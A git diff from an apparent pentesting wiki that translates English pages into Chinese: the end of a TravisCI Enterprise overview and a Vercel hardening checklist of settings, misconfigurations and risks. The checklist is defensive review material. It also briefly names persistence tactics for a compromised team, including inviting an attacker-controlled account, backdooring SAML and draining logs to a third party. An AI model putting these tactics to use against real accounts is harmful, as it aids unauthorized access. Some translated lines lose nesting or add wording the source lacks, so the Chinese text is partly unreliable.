-Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
+注意,当加密文件时,将在仓库中配置 2 个环境变量,如下所示:
.png>)
-## TravisCI Enterprise
+## TravisCI 企业版
-Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+Travis CI 企业版是 **Travis CI 的本地版本**,您可以在 **您的基础设施中部署**。可以将其视为 Travis CI 的“服务器”版本。使用 Travis CI 允许您在一个环境中启用易于使用的持续集成/持续部署 (CI/CD) 系统,您可以根据需要进行配置和安全设置。
-**Travis CI Enterprise consists of two major parts:**
+**Travis CI 企业版由两个主要部分组成:**
-1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
-2. TCI **Worker** and build environment images (also called OS images).
+1. TCI **服务**(或 TCI 核心服务),负责与版本控制系统的集成、授权构建、调度构建作业等。
+2. TCI **工作节点**和构建环境镜像(也称为操作系统镜像)。
-**TCI Core services require the following:**
+**TCI 核心服务需要以下内容:**
-1. A **PostgreSQL11** (or later) database.
-2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
-3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+1. 一个 **PostgreSQL11**(或更高版本)数据库。
+2. 部署 Kubernetes 集群的基础设施;如果需要,可以在服务器集群中或单台机器上部署。
+3. 根据您的设置,您可能希望自行部署和配置某些组件,例如 RabbitMQ - 有关更多详细信息,请参见 [设置 Travis CI 企业版](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/)。
-**TCI Worker requires the following:**
+**TCI 工作节点需要以下内容:**
-1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
-2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+1. 一个基础设施,可以在其中部署包含 **工作节点和链接的构建镜像** 的 Docker 镜像。
+2. 连接到某些 Travis CI 核心服务组件 - 有关更多详细信息,请参见 [设置工作节点](https://docs.travis-ci.com/user/enterprise/setting-up-worker/)。
-The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+部署的 TCI 工作节点和构建环境操作系统镜像的数量将决定您基础设施中 Travis CI 企业版部署的总并发容量。
.png>)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md
index 16dc93da7..05d0a70bc 100644
--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -2,440 +2,436 @@
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
+在 Vercel 中,**团队**是属于客户的完整 **环境**,而 **项目** 是一个 **应用程序**。
-For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
+对于 **Vercel** 的加固审查,您需要请求具有 **查看者角色权限** 的用户,或者至少对项目具有 **项目查看者权限** 以进行检查(如果您只需要检查项目而不需要检查团队配置)。
-## Project Settings
+## 项目设置
-### General
+### 一般
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
+**目的:** 管理基本项目设置,如项目名称、框架和构建配置。
-#### Security Configurations:
+#### 安全配置:
-- **Transfer**
- - **Misconfiguration:** Allows to transfer the project to another team
- - **Risk:** An attacker could steal the project
-- **Delete Project**
- - **Misconfiguration:** Allows to delete the project
- - **Risk:** Delete the prject
+- **转移**
+- **错误配置:** 允许将项目转移到另一个团队
+- **风险:** 攻击者可能会窃取项目
+- **删除项目**
+- **错误配置:** 允许删除项目
+- **风险:** 删除项目
---
-### Domains
+### 域名
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
+**目的:** 管理自定义域名、DNS 设置和 SSL 配置。
-#### Security Configurations:
+#### 安全配置:
-- **DNS Configuration Errors**
- - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- - **Risk:** Domain hijacking, traffic interception, and phishing attacks.
-- **SSL/TLS Certificate Management**
- - **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
-- **DNSSEC Implementation**
- - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
-- **Environment used per domain**
- - **Misconfiguration:** Change the environment used by the domain in production.
- - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
+- **DNS 配置错误**
+- **错误配置:** 指向恶意服务器的错误 DNS 记录(A、CNAME)。
+- **风险:** 域名劫持、流量拦截和网络钓鱼攻击。
+- **SSL/TLS 证书管理**
+- **错误配置:** 使用弱或过期的 SSL/TLS 证书。
+- **风险:** 易受中间人(MITM)攻击,危及数据完整性和机密性。
+- **DNSSEC 实施**
+- **错误配置:** 未能启用 DNSSEC 或 DNSSEC 设置不正确。
+- **风险:** 增加 DNS 欺骗和缓存投毒攻击的易受攻击性。
+- **每个域名使用的环境**
+- **错误配置:** 更改生产中域名使用的环境。
+- **风险:** 暴露潜在的秘密或不应在生产中可用的功能。
---
-### Environments
+### 环境
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
+**目的:** 定义不同的环境(开发、预览、生产),并具有特定的设置和变量。
-#### Security Configurations:
+#### 安全配置:
-- **Environment Isolation**
- - **Misconfiguration:** Sharing environment variables across environments.
- - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
-- **Access to Sensitive Environments**
- - **Misconfiguration:** Allowing broad access to production environments.
- - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
+- **环境隔离**
+- **错误配置:** 在不同环境之间共享环境变量。
+- **风险:** 生产秘密泄露到开发或预览环境中,增加暴露风险。
+- **对敏感环境的访问**
+- **错误配置:** 允许对生产环境的广泛访问。
+- **风险:** 未经授权的更改或访问实时应用程序,导致潜在的停机或数据泄露。
---
-### Environment Variables
+### 环境变量
-**Purpose:** Manage environment-specific variables and secrets used by the application.
+**目的:** 管理应用程序使用的特定于环境的变量和秘密。
-#### Security Configurations:
+#### 安全配置:
-- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
-- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
-- **Shared Environment Variables**
- - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **暴露敏感变量**
+- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。
+- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。
+- **敏感禁用**
+- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。
+- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
+- **共享环境变量**
+- **错误配置:** 这些是在团队级别设置的环境变量,也可能包含敏感信息。
+- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
---
### Git
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
+**目的:** 配置 Git 存储库集成、分支保护和部署触发器。
-#### Security Configurations:
+#### 安全配置:
-- **Ignored Build Step (TODO)**
- - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- - **Risk:** TBD
+- **忽略构建步骤(TODO)**
+- **错误配置:** 这个选项似乎允许配置一个 bash 脚本/命令,当在 Github 中推送新提交时执行,这可能允许 RCE。
+- **风险:** 待定
---
-### Integrations
+### 集成
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
+**目的:** 连接第三方服务和工具以增强项目功能。
-#### Security Configurations:
+#### 安全配置:
-- **Insecure Third-Party Integrations**
- - **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
-- **Over-Permissioned Integrations**
- - **Misconfiguration:** Granting excessive permissions to integrated services.
- - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
-- **Lack of Integration Monitoring**
- - **Misconfiguration:** Failing to monitor and audit third-party integrations.
- - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
+- **不安全的第三方集成**
+- **错误配置:** 与不受信任或不安全的第三方服务集成。
+- **风险:** 通过被破坏的集成引入漏洞、数据泄露或后门。
+- **过度授权的集成**
+- **错误配置:** 授予集成服务过多的权限。
+- **风险:** 未经授权访问项目资源、数据操纵或服务中断。
+- **缺乏集成监控**
+- **错误配置:** 未能监控和审计第三方集成。
+- **风险:** 延迟检测被破坏的集成,增加安全漏洞的潜在影响。
---
-### Deployment Protection
+### 部署保护
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
+**目的:** 通过各种保护机制确保部署安全,控制谁可以访问和部署到您的环境。
-#### Security Configurations:
+#### 安全配置:
-**Vercel Authentication**
+**Vercel 身份验证**
-- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
+- **错误配置:** 禁用身份验证或未强制执行团队成员检查。
+- **风险:** 未经授权的用户可以访问部署,导致数据泄露或应用程序滥用。
-**Protection Bypass for Automation**
+**自动化的保护绕过**
-- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
+- **错误配置:** 公开绕过秘密或使用弱秘密。
+- **风险:** 攻击者可以绕过部署保护,访问和操纵受保护的部署。
-**Shareable Links**
+**可分享链接**
-- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
+- **错误配置:** 不加选择地分享链接或未能撤销过期链接。
+- **风险:** 未经授权访问受保护的部署,绕过身份验证和 IP 限制。
-**OPTIONS Allowlist**
+**OPTIONS 允许列表**
-- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
+- **错误配置:** 允许过于宽泛的路径或敏感端点。
+- **风险:** 攻击者可以利用未保护的路径执行未经授权的操作或绕过安全检查。
-**Password Protection**
+**密码保护**
-- **Misconfiguration:** Using weak passwords or sharing them insecurely.
-- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **错误配置:** 使用弱密码或不安全地共享密码。
+- **风险:** 如果密码被猜测或泄露,可能导致未经授权访问部署。
+- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。
-**Deployment Protection Exceptions**
+**部署保护例外**
-- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **错误配置:** 不小心将生产或敏感域添加到例外列表。
+- **风险:** 关键部署暴露给公众,导致数据泄露或未经授权访问。
+- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。
-**Trusted IPs**
+**受信任的 IP**
-- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-- **Note:** Available on the **Enterprise** plan.
+- **错误配置:** 不正确地指定 IP 地址或 CIDR 范围。
+- **风险:** 合法用户被阻止或未经授权的 IP 获得访问。
+- **注意:** 在 **Enterprise** 计划中提供。
---
-### Functions
+### 函数
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
+**目的:** 配置无服务器函数,包括运行时设置、内存分配和安全策略。
-#### Security Configurations:
+#### 安全配置:
-- **Nothing**
+- **无**
---
-### Data Cache
+### 数据缓存
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
+**目的:** 管理缓存策略和设置,以优化性能和控制数据存储。
-#### Security Configurations:
+#### 安全配置:
-- **Purge Cache**
- - **Misconfiguration:** It allows to delete all the cache.
- - **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
+- **清除缓存**
+- **错误配置:** 允许删除所有缓存。
+- **风险:** 未经授权的用户删除缓存,导致潜在的 DoS。
---
-### Cron Jobs
+### 定时任务
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
+**目的:** 安排自动化任务和脚本在指定时间间隔运行。
-#### Security Configurations:
+#### 安全配置:
-- **Disable Cron Job**
- - **Misconfiguration:** It allows to disable cron jobs declared inside the code
- - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
+- **禁用定时任务**
+- **错误配置:** 允许禁用代码中声明的定时任务。
+- **风险:** 服务潜在中断(取决于定时任务的目的)
---
-### Log Drains
+### 日志排水
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
+**目的:** 配置外部日志服务以捕获和存储应用程序日志以进行监控和审计。
-#### Security Configurations:
+#### 安全配置:
-- Nothing (managed from teams settings)
+- 无(由团队设置管理)
---
-### Security
+### 安全
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
+**目的:** 各种影响项目访问、源保护等的安全相关设置的中央中心。
-#### Security Configurations:
+#### 安全配置:
-**Build Logs and Source Protection**
+**构建日志和源保护**
-- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
+- **错误配置:** 禁用保护或公开 `/logs` 和 `/src` 路径。
+- **风险:** 未经授权访问构建日志和源代码,导致信息泄露和潜在漏洞利用。
-**Git Fork Protection**
+**Git Fork 保护**
-- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
+- **错误配置:** 允许未经授权的拉取请求而没有适当的审查。
+- **风险:** 恶意代码可能被合并到代码库中,引入漏洞或后门。
-**Secure Backend Access with OIDC Federation**
+**使用 OIDC 联邦安全后端访问**
-- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-- **Risk:** Unauthorized access to backend services through flawed authentication flows.
+- **错误配置:** 错误设置 OIDC 参数或使用不安全的发行者 URL。
+- **风险:** 通过错误的身份验证流程未经授权访问后端服务。
-**Deployment Retention Policy**
+**部署保留策略**
-- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
+- **错误配置:** 设置保留期限过短(丢失部署历史)或过长(不必要的数据保留)。
+- **风险:** 在需要时无法执行回滚,或由于旧部署增加数据暴露风险。
-**Recently Deleted Deployments**
+**最近删除的部署**
-- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
+- **错误配置:** 不监控已删除的部署或仅依赖自动删除。
+- **风险:** 丢失关键部署历史,妨碍审计和回滚。
---
-### Advanced
+### 高级
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
+**目的:** 访问额外的项目设置,以微调配置和增强安全性。
-#### Security Configurations:
+#### 安全配置:
-**Directory Listing**
+**目录列表**
-- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
+- **错误配置:** 启用目录列表允许用户在没有索引文件的情况下查看目录内容。
+- **风险:** 暴露敏感文件、应用程序结构和潜在攻击入口。
---
-## Project Firewall
+## 项目防火墙
-### Firewall
+### 防火墙
-#### Security Configurations:
+#### 安全配置:
-**Enable Attack Challenge Mode**
+**启用攻击挑战模式**
-- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-- **Risk:** Potential user experience problems.
+- **错误配置:** 启用此功能提高了 Web 应用程序对 DoS 的防御,但以可用性为代价。
+- **风险:** 潜在的用户体验问题。
-### Custom Rules & IP Blocking
+### 自定义规则和 IP 阻止
-- **Misconfiguration:** Allows to unblock/block traffic
-- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
+- **错误配置:** 允许解除/阻止流量。
+- **风险:** 潜在的 DoS 允许恶意流量或阻止良性流量。
---
-## Project Deployment
+## 项目部署
-### Source
+### 源
-- **Misconfiguration:** Allows access to read the complete source code of the application
-- **Risk:** Potential exposure of sensitive information
+- **错误配置:** 允许访问读取应用程序的完整源代码。
+- **风险:** 潜在暴露敏感信息。
-### Skew Protection
+### 偏差保护
-- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
+- **错误配置:** 此保护确保客户端和服务器应用程序始终使用相同版本,因此不会出现客户端使用与服务器不同版本的不同步情况。
+- **风险:** 禁用此功能(如果启用)可能导致未来新部署中的 DoS 问题。
---
-## Team Settings
+## 团队设置
-### General
+### 一般
-#### Security Configurations:
+#### 安全配置:
-- **Transfer**
- - **Misconfiguration:** Allows to transfer all the projects to another team
- - **Risk:** An attacker could steal the projects
-- **Delete Project**
- - **Misconfiguration:** Allows to delete the team with all the projects
- - **Risk:** Delete the projects
+- **转移**
+- **错误配置:** 允许将所有项目转移到另一个团队。
+- **风险:** 攻击者可能会窃取项目。
+- **删除项目**
+- **错误配置:** 允许删除团队及其所有项目。
+- **风险:** 删除项目。
---
-### Billing
+### 计费
-#### Security Configurations:
+#### 安全配置:
-- **Speed Insights Cost Limit**
- - **Misconfiguration:** An attacker could increase this number
- - **Risk:** Increased costs
+- **速度洞察成本限制**
+- **错误配置:** 攻击者可能会增加此数字。
+- **风险:** 成本增加。
---
-### Members
+### 成员
-#### Security Configurations:
+#### 安全配置:
-- **Add members**
- - **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- - **Risk:** Attacker persistence
-- **Roles**
- - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- - **Risk**: Increate the exposure of the Vercel Team
+- **添加成员**
+- **错误配置:** 攻击者可能会通过邀请他控制的帐户来维持持久性。
+- **风险:** 攻击者持久性。
+- **角色**
+- **错误配置:** 授予不需要的人员过多权限增加了 Vercel 配置的风险。检查所有可能的角色 [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)。
+- **风险:** 增加 Vercel 团队的暴露。
---
-### Access Groups
+### 访问组
-An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
+在 Vercel 中,**访问组**是具有预定义角色分配的项目和团队成员的集合,能够在多个项目之间实现集中和简化的访问管理。
-**Potential Misconfigurations:**
+**潜在错误配置:**
-- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
+- **过度授权成员:** 分配的角色权限超过必要,导致未经授权的访问或操作。
+- **不当角色分配:** 错误分配与团队成员职责不符的角色,导致特权升级。
+- **缺乏项目隔离:** 未能分离敏感项目,允许比预期更广泛的访问。
+- **管理不足的组:** 未定期审查或更新访问组,导致过时或不当的访问权限。
+- **不一致的角色定义:** 在不同访问组中使用不一致或不清晰的角色定义,导致混淆和安全漏洞。
---
-### Log Drains
+### 日志排水
-#### Security Configurations:
+#### 安全配置:
-- **Log Drains to third parties:**
- - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- - **Risk:** Partial persistence
+- **向第三方的日志排水:**
+- **错误配置:** 攻击者可能会配置日志排水以窃取日志。
+- **风险:** 部分持久性。
---
-### Security & Privacy
+### 安全与隐私
-#### Security Configurations:
+#### 安全配置:
-- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- - **Misconfiguration:**
- - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- - **Risks:**
- - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
-- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- - **Misconfiguration:** Not adding critical Git scopes to the protected list.
-- **Risks:**
- - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- - **Risks:**
- - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
-- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- - **Misconfiguration:**\
- Granting access to audit logs to unauthorized team members.
- - **Risks:**
- - **Privacy Violations:** Exposure of sensitive user activities and data.
- - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
-- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
- - **Risk:** Maintain persistence
-- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- - **Risks:**
- - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
- - **Risks:**
- - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+- **团队电子邮件域:** 配置后,此设置会自动邀请以指定域(例如 `mydomain.com`)结尾的 Vercel 个人帐户在注册时和仪表板上加入您的团队。
+- **错误配置:**
+- 指定错误的电子邮件域或在团队电子邮件域设置中拼写错误的域。
+- 使用常见电子邮件域(例如 `gmail.com`、`hotmail.com`)而不是公司特定域。
+- **风险:**
+- **未经授权的访问:** 来自意外域的用户可能会收到加入您团队的邀请。
+- **数据暴露:** 潜在暴露敏感项目信息给未经授权的个人。
+- **受保护的 Git 范围:** 允许您为团队添加最多 5 个 Git 范围,以防止其他 Vercel 团队从受保护范围部署存储库。多个团队可以指定相同的范围,允许两个团队访问。
+- **错误配置:** 未将关键 Git 范围添加到受保护列表。
+- **风险:**
+- **未经授权的部署:** 其他团队可能未经授权从您组织的 Git 范围部署存储库。
+- **知识产权暴露:** 专有代码可能被部署并在您的团队之外访问。
+- **环境变量策略:** 强制执行团队环境变量的创建和编辑策略。具体而言,您可以强制所有环境变量作为 **敏感环境变量** 创建,这只能由 Vercel 的部署系统解密。
+- **错误配置:** 保持对敏感环境变量的强制执行禁用。
+- **风险:**
+- **秘密暴露:** 环境变量可能被未经授权的团队成员查看或编辑。
+- **数据泄露:** 敏感信息如 API 密钥和凭据可能被泄露。
+- **审计日志:** 提供团队活动的导出,最长可达 90 天。审计日志有助于监控和跟踪团队成员执行的操作。
+- **错误配置:**\
+授予未经授权的团队成员访问审计日志的权限。
+- **风险:**
+- **隐私侵犯:** 暴露敏感用户活动和数据。
+- **篡改日志:** 恶意行为者可能会更改或删除日志以掩盖其踪迹。
+- **SAML 单点登录:** 允许为您的团队自定义 SAML 身份验证和目录同步,支持与身份提供者(IdP)集成以实现集中身份验证和用户管理。
+- **错误配置:** 攻击者可能会在设置 SAML 参数(如实体 ID、SSO URL 或证书指纹)时后门团队。
+- **风险:** 维持持久性。
+- **IP 地址可见性:** 控制 IP 地址是否在监控查询和日志排水中显示,这在某些数据保护法律下可能被视为个人信息。
+- **错误配置:** 在没有必要的情况下保持 IP 地址可见性启用。
+- **风险:**
+- **隐私侵犯:** 不符合数据保护法规(如 GDPR)。
+- **法律后果:** 由于处理个人数据不当而可能面临罚款和处罚。
+- **IP 阻止:** 允许配置 Vercel 应该阻止请求的 IP 地址和 CIDR 范围。被阻止的请求不会计入您的账单。
+- **错误配置:** 可能被攻击者滥用以允许恶意流量或阻止合法流量。
+- **风险:**
+- **对合法用户的服务拒绝:** 阻止有效用户或合作伙伴的访问。
+- **操作中断:** 某些地区或客户的服务可用性丧失。
---
-### Secure Compute
+### 安全计算
-**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+**Vercel 安全计算** 通过建立具有专用 IP 地址的隔离网络,启用 Vercel 函数与后端环境(例如数据库)之间的安全、私密连接。这消除了公开暴露后端服务的需要,增强了安全性、合规性和隐私。
-#### **Potential Misconfigurations and Risks**
+#### **潜在错误配置和风险**
-1. **Incorrect AWS Region Selection**
- - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
-2. **Overlapping CIDR Blocks**
- - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
-3. **Improper VPC Peering Configuration**
- - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
-4. **Excessive Project Assignments**
- - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
-5. **Inadequate IP Address Management**
- - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
-6. **Including Build Containers Unnecessarily**
- - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
-7. **Failure to Securely Handle Bypass Secrets**
- - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
-8. **Ignoring Region Failover Configurations**
- - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
-9. **Exceeding VPC Peering Connection Limits**
- - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
-10. **Insecure Network Settings**
- - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+1. **错误的 AWS 区域选择**
+- **错误配置:** 为安全计算网络选择的 AWS 区域与后端服务的区域不匹配。
+- **风险:** 延迟增加、潜在的数据驻留合规性问题和性能下降。
+2. **重叠的 CIDR 块**
+- **错误配置:** 选择与现有 VPC 或其他网络重叠的 CIDR 块。
+- **风险:** 网络冲突导致连接失败、未经授权访问或网络间数据泄露。
+3. **不当的 VPC 对等配置**
+- **错误配置:** 错误设置 VPC 对等(例如,错误的 VPC ID、未完成的路由表更新)。
+- **风险:** 通过错误的身份验证流程未经授权访问后端基础设施、连接失败和潜在的数据泄露。
+4. **过多的项目分配**
+- **错误配置:** 在没有适当隔离的情况下将多个项目分配给单个安全计算网络。
+- **风险:** 共享 IP 暴露增加攻击面,可能允许被破坏的项目影响其他项目。
+5. **不充分的 IP 地址管理**
+- **错误配置:** 未能适当管理或轮换专用 IP 地址。
+- **风险:** IP 欺骗、跟踪漏洞和如果 IP 与恶意活动相关联则可能被列入黑名单。
+6. **不必要地包含构建容器**
+- **错误配置:** 在构建期间不需要后端访问时将构建容器添加到安全计算网络。
+- **风险:** 扩大攻击面、增加配置延迟和不必要的网络资源消耗。
+7. **未能安全处理绕过秘密**
+- **错误配置:** 暴露或错误处理用于绕过部署保护的秘密。
